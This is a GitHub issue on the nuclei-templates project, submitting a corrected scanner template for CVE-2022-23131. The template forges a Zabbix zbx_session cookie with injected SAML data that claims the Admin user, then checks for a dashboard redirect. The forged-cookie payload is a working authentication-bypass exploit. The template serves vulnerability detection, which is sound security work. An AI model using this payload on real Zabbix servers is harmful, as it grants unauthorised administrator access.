### ISSUE TITLE
error poc CVE-2022-23131.yaml

### ISSUE THREAD

**Issue by spac3wh1te** [projectdiscovery/nuclei-templates#3784]
Submit a right one.
```
id: CVE-2022-23131

requests:
  - raw:
      - |
        GET /index.php HTTP/1.1
        Host: {{Hostname}}
   
      - |
        GET /index_sso.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: zbx_session={{base64(replace(base64_decode(url_decode("{{cookie}}")),"}",",\"saml_data\":{\"username_attribute\":\"Admin\"}}"))}}

        
    extractors:
      - type: regex
        name: cookie
        group: 1
        internal: true
        part: header
        regex:
          - 'session=(.*?);'

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "zabbix.php?action=dashboard.view"

      - type: status
        status:
          - 302
```
